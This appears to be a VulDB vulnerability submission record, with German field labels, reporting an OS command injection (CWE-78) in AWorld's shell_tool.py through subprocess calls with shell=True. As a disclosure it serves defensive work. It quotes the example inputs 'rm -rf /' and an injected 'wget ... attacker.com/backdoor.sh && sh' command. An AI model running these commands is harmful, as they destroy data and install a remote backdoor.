| Titel | inclusionAI AWorld 0.0 Command Injection |
|---|
| Beschreibung | AWorld is a tool designed for building, evaluating, and running General Multi-Agent Assistance. However, it contains a critical security vulnerability in the file `AWorld/aworld/virtual_environments/terminals/shell_tool.py`.
The vulnerability is of the type CWE-78: OS Command Injection. The code in this file makes use of `subprocess.run()` and `subprocess.Popen()` functions to execute user input commands. The concerning aspect is that the `shell` parameter in these functions is set to `True`.
In the `execute` method, when `capture_output` is `True`, `subprocess.run()` is called with `shell=True`, and when `capture_output` is `False`, `subprocess.Popen()` is called with `shell=True`. Similarly, the `execute_async` method also calls `subprocess.Popen()` with `shell=True`.
This setting allows an attacker to inject malicious commands through user input. For instance, if an attacker supplies input like `rm -rf /` in a scenario where the application accepts user shell commands, the malicious command will be executed by the system. In more sophisticated attacks, an attacker could inject commands to download and execute a backdoor script from a remote server, such as `; wget http://attacker.com/backdoor.sh && sh backdoor.sh`, which can lead to unauthorized access and further malicious activities.
More details: https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| Quelle | ⚠️ https://github.com/inclusionAI/AWorld/issues/38 |
|---|
| Benutzer | ybdesire (UID 83239) |
|---|
| Einreichung | 16.04.2025 05:41 (vor 12 Monaten) |
|---|
| Moderieren | 28.04.2025 07:56 (12 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 306395 [inclusionAI AWorld bis 8c257626e648d98d793dd9a1a950c2af4dd84c4e shell_tool.py subprocess.run/subprocess.Popen erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|